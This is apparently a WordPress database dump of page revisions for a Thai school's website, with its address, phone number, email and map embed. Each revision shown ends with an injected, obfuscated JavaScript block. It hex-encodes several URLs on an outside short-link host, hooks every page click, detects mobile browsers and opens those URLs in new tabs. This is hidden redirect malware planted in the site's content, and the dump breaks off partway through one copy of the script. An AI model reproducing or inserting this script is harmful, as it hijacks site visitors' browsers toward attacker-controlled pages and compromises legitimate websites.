{\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-03 21:26:01','2024-08-03 14:26:01','',14,'http://pakhaeng.ssk.in.th/?p=508',0,'revision','',0),
(509,1,'2024-08-03 21:28:28','2024-08-03 14:28:28','<!-- wp:heading {\"level\":1,\"style\":{\"elements\":{\"link\":{\"color\":{\"text\":\"var:preset|color|white\"}}}},\"backgroundColor\":\"luminous-vivid-orange\",\"textColor\":\"white\",\"fontSize\":\"small\"} -->\n<h1 class=\"wp-block-heading has-white-color has-luminous-vivid-orange-background-color has-text-color has-background has-link-color has-small-font-size\"><strong>โรงเรียนบ้านหนองปลาเข็ง กอไหล่</strong></h1>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>ที่ตั้ง 96 หมู่ 6 ตำบลโพธิ์  อำเภอโนนคูณ จังหวัดศรีสะเกษ 33250</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>หมายเลขโทรศัพท์ :093-325-2659</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>E-mail : 33010169@sisaketedu1.go.th</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:buttons -->\n<div class=\"wp-block-buttons\"><!-- wp:button {\"backgroundColor\":\"pale-pink\",\"width\":50,\"style\":{\"border\":{\"radius\":\"13px\"}}} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-50\"><a class=\"wp-block-button__link has-pale-pink-background-color has-background wp-element-button\" style=\"border-radius:13px\">แผนที่ตั้ง</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>&lt;iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\">&lt;/iframe></code></pre>\n<!-- /wp:code -->\n\n<!-- wp:kadence/googlemaps {\"uniqueID\":\"362_231c47-17\",\"zoom\":17,\"location\":\"โรงเรียนบ้านหนองปลาเข็ง กอไหล่\",\"kbVersion\":2} /-->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลการติดต่อหน่วยงาน','','inherit','closed','closed','','362-revision-v1','','','2024-08-03 21:28:28','2024-08-03 14:28:28','',362,'http://pakhaeng.ssk.in.th/?p=509',0,'revision','',0),
(510,1,'2024-08-03 21:30:01','2024-08-03 14:30:01','<!-- wp:heading {\"level\":1,\"style\":{\"elements\":{\"link\":{\"color\":{\"text\":\"var:preset|color|white\"}}}},\"backgroundColor\":\"luminous-vivid-orange\",\"textColor\":\"white\",\"fontSize\":\"small\"} -->\n<h1 class=\"wp-block-heading has-white-color has-luminous-vivid-orange-background-color has-text-color has-background has-link-color has-small-font-size\"><strong>โรงเรียนบ้านหนองปลาเข็ง กอไหล่</strong></h1>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>ที่ตั้ง 96 หมู่ 6 ตำบลโพธิ์  อำเภอโนนคูณ จังหวัดศรีสะเกษ 33250</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>หมายเลขโทรศัพท์ :093-325-2659</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>E-mail : 33010169@sisaketedu1.go.th</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:buttons -->\n<div class=\"wp-block-buttons\"><!-- wp:button {\"backgroundColor\":\"pale-pink\",\"width\":50,\"style\":{\"border\":{\"radius\":\"13px\"}}} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-50\"><a class=\"wp-block-button__link has-pale-pink-background-color has-background wp-element-button\" style=\"border-radius:13px\">แผนที่ตั้ง</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:kadence/googlemaps {\"uniqueID\":\"362_231c47-17\",\"zoom\":17,\"location\":\"โรงเรียนบ้านหนองปลาเข็ง กอไหล่\",\"kbVersion\":2} /-->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 